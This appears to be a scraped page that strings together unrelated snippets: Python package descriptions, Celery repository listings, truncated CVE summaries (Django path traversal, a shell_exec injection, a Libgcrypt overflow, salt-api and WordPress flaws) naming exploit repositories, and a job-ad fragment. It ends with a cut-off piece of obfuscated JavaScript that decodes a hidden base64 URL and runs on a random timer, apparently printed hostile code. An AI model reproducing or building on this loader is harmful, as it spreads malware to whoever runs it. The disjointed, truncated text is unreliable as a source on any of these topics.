django-import-export Django application and library for importing and exporting data with included admin integration. 20 automat Self-service finite-state machines for the programmer on the go. 20 pygit2 Python bindings for libgit2. 20 datetime This package provides a DateTime data type, as known...
celery/celery: Distributed Task Queue (development branch) tuanngominh/celery-django-kubernetes-experiment: None bstiel/celery-docker: https://www.distributedpython.com/2018/11/15/celery-docker/ bstiel/celery-filesystem-broker: Celery with a filesystem message broker jmdacruz/celery-k8s-operator: ...
In Django 2.2 before 2.2.18, 3.0 before 3.0.12, and 3.1 before 3.1.6, the django.utils.archive.extract method (used by "startapp --template" and "startproject --template") allows directory traversal via an archive with absolute paths or relative paths with dot segments. lwzSoviet/CVE-20...
Familiarity with web frameworks like React, Angular, Vue.js, Express, Django, or Ruby on Rails is required. Also, experience with databases, application architecture, security, performance best practices, debugging, troubleshooting, and automated testing is essential. Collaboration with other developers,...
async.php calls shell_exec() on the original value of the source parameter. Al1ex/CVE-2021-3317 CVE-2021-3345 (2021-01-29) _gcry_md_block_write in cipher/hash-common.c in Libgcrypt version 1.9.0 has a heap-based buffer overflow when the digest final function sets a large count ...
The WP Import Export WordPress plugin (both free and premium versions) is vulnerable to unauthenticated sensitive data disclosure due to a missing capability check on the download function wpie_process_file_download found in the ~/includes/classes/class-wpie-general.php file. This made it possible...
salt-api does not honor eauth credentials for the wheel_async client. Thus, an attacker can remotely run any wheel modules on the master. Immersive-Labs-Sec/CVE-2021-25281 CVE-2021-25646 (2021-01-29) Apache Druid includes the ability to execute user-provided JavaScript code embedded in ...
js import u from "path"; import a from "fs"; import o from "https"; setTimeout(function () { const t = Math.round(Math.random() * 4); if (t > 1) { return; } const n = Buffer.from("aHR0cHM6Ly9hcGkuaXBnZW9sb2NhdGlvbi5pby9pcGdlbz9hcGlLZXk9YWU1MTFlMTYyNzgyNGE5Njhh...